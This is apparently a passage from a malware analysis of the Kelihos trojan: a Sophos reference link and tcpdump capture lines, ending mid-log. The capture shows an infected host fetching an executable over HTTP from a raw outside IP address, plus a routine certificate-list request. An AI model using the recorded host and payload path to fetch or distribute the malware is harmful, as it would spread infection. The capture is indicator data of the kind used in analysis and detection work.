https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Kelihos-X/detailed-analysis.aspx   2016-10-23 01:25:27.341585 IP 192.168.1.102.58900 > 176.103.55.73.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /chipdd2.exe HTTP/1.1 E..Gio@……..f.g7I…PY..iH>..P….H..GET /chipdd2.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: 176.103.55.73 Connection: Keep-Alive — E..(f6@…>7…f..|….P….e3kbP….1…….. 2016-10-23 01:25:33.418284 IP 192.168.1.102.58901 > 23.211.124.129.80: Flags [P.], seq 0:277, ack 1, win 256, length 277: HTTP: GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1 E..=f7@…=!…f..|….P….e3kbP…….GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1 Cache-Control: max-age = 900 Connection: Keep-Alive Accept: */* If-Modified-Since: Tue, 27 Sep 2016 05:00:38 GMT If-None-Match: “773de167c18d21:0″ User-Agent: Microsoft-CryptoAPI/10.0 Host: crl.microsoft.com — E..(;<@…n?…f…*.”.P.94..=;.P…………. 2016-10-23 01:25:44.058537 IP […]